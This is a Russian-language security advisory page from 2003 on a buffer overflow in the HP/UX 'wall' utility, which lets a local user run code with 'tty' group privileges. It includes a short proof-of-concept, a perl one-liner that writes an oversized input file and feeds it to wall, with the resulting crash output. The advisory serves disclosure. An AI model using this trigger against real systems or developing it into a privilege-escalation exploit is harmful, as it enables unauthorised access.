Переполнение буфера в HP/UX

Дата публикации:
12.02.2003
Всего просмотров:
677
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в '/usr/sbin/wall' в операционной системе HP/UX. Локальный пользователь может выполнить произвольный код с поднятыми привилегиями.

Сообщается, что локальный пользователь может вызвать переполнение буфера, создавая специально обработанный файл, который будет широковещательно передан утилите wall. Уязвимость позволяет локальному пользователю выполнить произвольный код с привилегиями 'tty' группы.

Пример:

(Tested on HPUX 11.11)

perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
Memory fault

(Tested on HPUX 11.00)
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
bash-2.04$ /usr/sbin/wall /tmp/out
Segmentation fault

Уязвимость обнаружена в HP/UX 11.11, 11.00

Ссылки: HPUX Wall Buffer Overflow
или введите имя

CAPTCHA